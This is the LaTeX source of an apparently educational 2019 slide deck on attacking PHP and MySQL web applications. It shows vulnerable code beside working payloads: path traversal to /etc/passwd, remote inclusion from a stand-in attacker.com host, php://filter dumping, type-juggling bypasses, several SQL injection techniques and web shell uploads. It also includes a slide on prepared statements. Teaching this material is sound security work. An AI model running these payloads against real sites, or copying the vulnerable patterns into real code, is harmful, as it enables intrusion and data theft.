main.tex

\documentclass[xcolor=dvipsnames,aspectratio=169,handout]{beamer} % PDF
%\documentclass[xcolor=dvipsnames,aspectratio=169]{beamer} % Presentation
\usecolortheme[dark,accent=cyan]{solarized} % Dark theme
%\usecolortheme[light]{solarized} % Light theme
\usepackage{multicol}
\usepackage{url}
\usepackage{hyperref}
\usepackage{listings,xcolor}

\lstdefinestyle{PHP}{
  belowcaptionskip=1\baselineskip,
  breaklines=true,
  language=PHP,
  showstringspaces=false,
	basicstyle=\footnotesize\ttfamily,
	backgroundcolor=\color{solarizedRebase02},
	xleftmargin=\parindent,
  keywordstyle=\color{Magenta},
  commentstyle=\color{green!75!black},
  identifierstyle=\color{TealBlue},
  stringstyle=\color{Bittersweet}
}

\lstdefinestyle{SQL}{
  belowcaptionskip=1\baselineskip,
  breaklines=true,
  language=SQL,
  showstringspaces=false,
	basicstyle=\footnotesize\ttfamily,
	backgroundcolor=\color{solarizedRebase02},
  xleftmargin=\parindent,
  keywordstyle=\color{Magenta},
  commentstyle=\color{green!75!black},
  identifierstyle=\color{TealBlue},
  stringstyle=\color{Bittersweet}
}

\title{Web Exploitation}
\author{ZenHackAdemy}
\subtitle{PHP and MySQL Edition}
\date{May 6, 2019}

\begin{document}

  \begin{frame}[plain]
    \maketitle
    \begin{columns}
      \column{0.5\textwidth}
        \center {
          \includegraphics[width=0.3\textwidth] {style/qrcode.png}\\
          \href{http://zenhack.team} {Visit us!}
        }
      \column{0.5\textwidth}
        \center{
          \includegraphics[width=0.3\textwidth] {style/giotino.jpg}\\
          @Giotino
        }
    \end{columns}
  \end{frame}

  \begin{frame}[fragile]{Not even trying}

    \Large \textbf{Trust based authentication} \normalsize

    \begin{lstlisting}[style=PHP]
if ($_GET['authorized'] == 'true')
  show_secret_admin_area();
    \end{lstlisting}
    
    \pause

    \vfill

    \Large \textbf{Cookie poisoning} \normalsize

    \begin{lstlisting}[style=PHP]
if ($_COOKIE['username'] == 'admin')
  show_secret_admin_area();
    \end{lstlisting}
  \end{frame}

  \begin{frame}[fragile]{Path Traversal (LFI)}
    \Large \textbf{Regular file access} \normalsize

    \vspace{0.75\baselineskip}

    http://example.com/?page=main.php

    \begin{lstlisting}[style=PHP]
include('pages/' . $_GET['page']);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{Out of scope file access} \normalsize

    \vspace{0.75\baselineskip}

    http://example.com/?page=../../../../etc/passwd

    \begin{lstlisting}[style=PHP]
include('pages/../../../../etc/passwd');
    \end{lstlisting}
  \end{frame}

  \begin{frame}[fragile]{LFI remote code execution}
    \Large \textbf{Less secure website} \normalsize

    \vspace{0.5\baselineskip}

    http://example.com/?page=main.php

    \begin{lstlisting}[style=PHP]
include($_GET['page']);
    \end{lstlisting}

    With PHP configuration $->$ allow\_url\_include=On

    \pause

    \vfill

    \Large \textbf{Code execution} \normalsize

    \vspace{0.5\baselineskip}

    http://example.com/?page=http://attacker.com/code.txt

    \begin{lstlisting}[style=PHP]
include('http://attacker.com/code.txt');
    \end{lstlisting}
    
    \pause

    We are telling the server to include and evaluate http://attacker.com/code.txt that contains malicious code
  \end{frame}

  \begin{frame}[fragile]{LFI arbitrary code execution}
    \Large \textbf{Event worse} \normalsize

    \vspace{0.5\baselineskip}

    http://example.com/?page=php://input

    \begin{lstlisting}[style=PHP]
include('php://input');
    \end{lstlisting}
    
    \pause

    \vspace{0.75\baselineskip}

    We are telling the server to include and evaluate php://input, that's the body of the request. If we POST the website with some PHP code and that specific parameter we can execute arbitrary PHP code
  \end{frame}

  \begin{frame}[fragile]{LFI dump them all}
    \Large \textbf{Base64 dumping} \normalsize

    \vspace{0.5\baselineskip}

    http://example.com/?page=php://filter/convert.base64-encode/resource=index.php

    \begin{lstlisting}[style=PHP]
include('php://filter/convert.base64-encode/resource=index.php');
    \end{lstlisting}

    \vspace{0.25\baselineskip}

    Works without PHP configuration $->$ allow\_url\_include

    \vfill
    
    \pause

    We are telling the server to include and evaluate php://filter/convert.base64-encode/resource=filename. \\
    The php filter "convert.base64-encode" read the file "filename" (even out of scope) and returns its content Base64 encoded. \\
    Using this technique we can dump all kind of files \underline{entirely}, including PHP ones which, being Base64 encoded, will not be executed.
  \end{frame}

  \begin{frame}[fragile]{Type Juggling}
    \Large \center\textbf{Identical Operator === (checks value and data type)} \normalsize
    \pause

    \begin{columns}
      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = 123;
$b = 123;
$a == $b;
// true
        \end{lstlisting}

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = "test";
$b = "test";
$a == $b;
// true
        \end{lstlisting}

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = NULL;
$b = 0;
$a === $b;
// false
        \end{lstlisting}

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = "1";
$b =  1 ;
$a === $b;
// false
        \end{lstlisting}
    \end{columns}
    \pause

    \vfill

    \Large \center\textbf{Equality Operator == (checks only value)} \normalsize
    \pause

    \begin{columns}
      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = 123;
$b = 123;
$a == $b;
// true
        \end{lstlisting}
      \pause

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = "test";
$b = "test";
$a == $b;
// true
        \end{lstlisting}
      \pause

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = NULL;
$b = 0;
$a == $b;
// true
        \end{lstlisting}
      \pause

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = "1";
$b =  1 ;
$a == $b;
// true
        \end{lstlisting}
    \end{columns}
  \end{frame}

  \begin{frame}[fragile]{Type Juggling and Beyond}
    \Large \textbf{More} \normalsize
    \pause

    \begin{columns}
      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = '0a2b3c';
$b =  0      ;
$a == $b;
// true
        \end{lstlisting}
      \pause

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = '0.1test';
$b =  0.1     ;
$a == $b;
// true
        \end{lstlisting}
      \pause

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = '0e98765';
$b = '0e1'    ;
$a == $b;
// true
        \end{lstlisting}
      \pause

      \column{0.25\textwidth}
        \begin{lstlisting}[style=PHP]
$a = ['test'];
$b = true    ;
$a == $b;
// true
        \end{lstlisting}
    \end{columns}
    \pause

    \vfill

    \Large \textbf{What about strcmp(str1, str2)} \normalsize
    \pause

    "Returns $<0$ if str1 is less than str2; $>0$ if str1 is greater than str2, and $0$ if they are equal." - \url{https://www.php.net/manual/en/function.strcmp.php} \\
    Sounds good, but what if an argument is not a string? 
    \pause

    \begin{lstlisting}[style=PHP]
strcmp([], "test"); // NULL (and a warning)
strcmp([], "secretPassword") == 0; // true (and a warning) 
    \end{lstlisting}
    A comparison between a string and an array is always a perfect match. \\
    Also works with NULL, functions and classes
  \end{frame}

  \begin{frame}[fragile]{SQL Injection}
    \Large \textbf{A common query style} \normalsize

    \begin{lstlisting}[style=PHP]
$username = $_GET['user'];
$query = "SELECT * FROM users WHERE username = '" . $username . "'";
$db->query($query);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{A common query injection} \normalsize

    \vspace{0.5\baselineskip}
    \large ' OR true -{}- - \normalsize
    \vspace{0.5\baselineskip}

    http://example.com/?user=\%27\%20OR\%20true\%20-{}-\%20-
    
    \pause

    \vspace{0.5\baselineskip}

    \begin{lstlisting}[style=SQL]
SELECT * FROM users WHERE username = '' OR true -- -'
    \end{lstlisting}
  \end{frame}

  \begin{frame}[fragile]{SQL Injection}
    \Large \textbf{Sanitized} \normalsize

    \begin{lstlisting}[style=PHP]
$id = $db->real_escape_string($_GET['id']);
$query = "SELECT * FROM users WHERE id = " . $id;
$db->query($query);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{New query, new injection} \normalsize
    
    \vspace{0.5\baselineskip}
    \large 0 OR true \normalsize
    \vspace{0.5\baselineskip}

    http://example.com/?id=\%200\%20OR\%20true
    
    \pause

    \vspace{0.5\baselineskip}

    \begin{lstlisting}[style=SQL]
SELECT * FROM users WHERE id = 0 OR true
    \end{lstlisting}
  \end{frame}

  \begin{frame}[fragile]{SQL Injection}
    \Large \textbf{Login bypass (easy)} \normalsize

    \begin{lstlisting}[style=PHP]
$user = $_GET['user']; $pass = $_GET['pass'];
$query = "SELECT * FROM users WHERE 
  username = '" . $user . "' AND password = MD5('" . $pass . "')";

$result = $db->query($query);
if($result->num_rows > 0) {
  $row = $result->fetch_assoc();
  echo("Welcome " . $row['username']);
}
    \end{lstlisting}

    \pause

    We can alter the query to return a user without knowing the password. \\
    \large ') OR true LIMIT 0, 1 -{}- - \normalsize

    \begin{lstlisting}[style=SQL]
SELECT * FROM users WHERE 
  username = '' AND password = MD5('') OR true LIMIT 0, 1 -- -');
    \end{lstlisting}
  \end{frame}

  \begin{frame}[fragile]{SQL tricks}

    \url{https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/}

    \vfill
    
    \pause

    \Large \textbf{String HEX representation} \normalsize

    \begin{lstlisting}[style=SQL]
'admin' = 0x61646D696E
    \end{lstlisting}

    In SQL strings can also be represented in hexadecimal notation \\
    That's useful to insert strings in a payload sanitized by real\_escape\_string

    \vfill
    
    \pause

    \Large \textbf{Query stacking} \normalsize

    \begin{lstlisting}[style=SQL]
SELECT * FROM users; DROP DATABASE db;
    \end{lstlisting}

    Modern SQL drivers do not permit different type of query to be stacked (e.g. SELECT...; UPDATE ...;)
  \end{frame}

  \begin{frame}[fragile]{SQL Injection}
    \Large \textbf{Now what?} \normalsize

    \begin{lstlisting}[style=PHP]
$username = $_GET['user'];
$query = "SELECT * FROM users WHERE username = '" . $username . "'";

if(!$result = $db->query($query))
  die($db->error);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{Error based SQLi} \normalsize

    \vspace{0.5\baselineskip}

    In this case we use the XML parser included with MySQL. When it finds and error it returns part of the code it was parsing. We can have it parsing a result of a select making it leak the result. (Query must output only one column and one row)

    \pause

    \begin{lstlisting}[style=SQL]
SELECT extractvalue(rand(),concat(0x3A,( 
  SELECT username FROM users LIMIT 0,1 
)))
    \end{lstlisting}
  \end{frame}

  \begin{frame}[fragile]{SQL Injection}
    \Large \textbf{No errors?} \normalsize

    \begin{lstlisting}[style=PHP]
$username = $_GET['user'];
$query = "SELECT * FROM users WHERE username = '" . $username . "'";
$result = $db->query($query);

$row = $result->fetch_assoc();
echo($row["id"] .'|'.  $row["username"] .'|'. $row["email"]);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{Union based SQLi} \normalsize

    \vspace{0.5\baselineskip}

    We use the mask on the website (the echo in our PHP) to show data from the database

    \pause

    \begin{lstlisting}[style=SQL]
UNION SELECT username, password AS email, 0 FROM admins
    \end{lstlisting}

    \pause

    \begin{lstlisting}[style=SQL]
SELECT * FROM users WHERE username = ''
  UNION SELECT username, password AS email, 0 FROM admins -- -'
    \end{lstlisting}

    Number of columns must match the first SELECT (in this case 3)
  \end{frame}

  \begin{frame}[fragile]{SQL Injection}
    \Large \textbf{No mask?} \normalsize

    \begin{lstlisting}[style=PHP]
$username = $_GET['user'];
$query = "SELECT * FROM users WHERE username = '" . $username . "'";
$result = $db->query($query);

if ($result->num_rows > 0)
  echo("Logged in");
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{Boolean Based Blind SQLi} \normalsize

    \vspace{0.5\baselineskip}

    We issue boolean SQL queries and check for the "Logged in" output \\
    Using MySQL functions as LENGTH and MID we can reduce the amount of requests to retrieve information
  \end{frame}

  \begin{frame}[fragile]{SQL Injection}
    \Large \textbf{No output?} \normalsize

    \begin{lstlisting}[style=PHP]
$id = $_GET['id'];
$query = "UPDATE users SET name = 'John' WHERE id = " . $id;
$db->query($query);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{Time Based Blind SQLi} \normalsize

    \vspace{0.5\baselineskip}

    We issue SQL queries containing SLEEP function and treat the response time as a boolean output

    \pause

    \begin{lstlisting}[style=SQL]
UPDATE users SET name = 'John' WHERE id = -1;
  IF(MID(VERSION(),1,1) = '5', SLEEP(10), 0);
-- Sleep 10 seconds if MySQL version is 5
    \end{lstlisting}
  \end{frame}

  \begin{frame}[fragile]{SQL Injection}
    \Large \textbf{How to prevent?} \normalsize

    \vspace{0.5\baselineskip}

    \pause

    \large Prepared Statements \normalsize

    \begin{lstlisting}[style=PHP]
$stmt = $db->prepare("SELECT * FROM users WHERE id=? AND username=?");
$stmt->bind("i", $id);
$stmt->bind("s", $username);
$stmt->execute();
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{How it works?} \normalsize

    \vspace{0.5\baselineskip}

    Query and parameters (data) are not assembled on the client. When the query reaches the database it's compiled by the SQL engine and subsequently the data is replaced. In this way parameters cannot alter the structure of the query
  \end{frame}

  \begin{frame}[fragile]{SQL tricks}
    \Large \textbf{Reading files} \normalsize

    \begin{lstlisting}[style=SQL]
SELECT load_file('/etc/passwd')
    \end{lstlisting}

    \vfill
    
    \pause

    \Large \textbf{Writing files} \normalsize

    \begin{lstlisting}[style=SQL]
SELECT 'Content to Write' INTO OUTFILE '/tmp/test.txt'
    \end{lstlisting}
  \end{frame}

  \begin{frame}[fragile]{Upload Exploitation}
    \Large \textbf{PHP upload is easy} \normalsize

    \begin{lstlisting}[style=PHP]
$dstfile = 'uploads/' . basename($_FILES['file']['name']);
$success = move_uploaded_file($_FILES['file']['tmp_name'], $dstfile);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{Easy to exploit} \normalsize
    
    \vspace{0.5\baselineskip}

    Simply upload a PHP file and enjoy

    \vspace{0.5\baselineskip}

    http://example.com/uploads/shell.php
  \end{frame}

  \begin{frame}[fragile]{Upload Exploitation}
    \Large \textbf{Check file integrity} \normalsize

    \begin{lstlisting}[style=PHP]
$dstfile = 'uploads/' . basename($_FILES['file']['name']);

$isImage = getimagesize($_FILES["file"]["tmp_name"]);

if ($isImage !== false) // If it can be parsed as image
  move_uploaded_file($_FILES['file']['tmp_name'], $dstfile);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{Give the server what it wants} \normalsize

    \vspace{0.5\baselineskip}

    PNGs come to help. We can have whatever data we want after the image in its file \\
    We can upload $|$image + PHP payload$|$.php files to the server
  \end{frame}

  \begin{frame}[fragile]{Upload Exploitation}
    \Large \textbf{Filter extensions} \normalsize

    \begin{lstlisting}[style=PHP]
$dstfile = 'uploads/' . basename($_FILES['file']['name']);
$extension = strtolower(pathinfo($dstfile, PATHINFO_EXTENSION));

$enExtensions = array("jpeg","jpg","png","gif");

if (in_array($extension, $enExtensions)) // If the extension is OK
  move_uploaded_file($_FILES['file']['tmp_name'], $dstfile);
    \end{lstlisting}

    \pause

    \vfill

    \Large \textbf{No exploit for us...} \normalsize
    
    \vspace{0.5\baselineskip}

    The uploaded code cannot be directly executed because the file extension is not handled by the PHP engine \\
    But we can include the file with an LFI and our code will be executed
  \end{frame}

\end{document}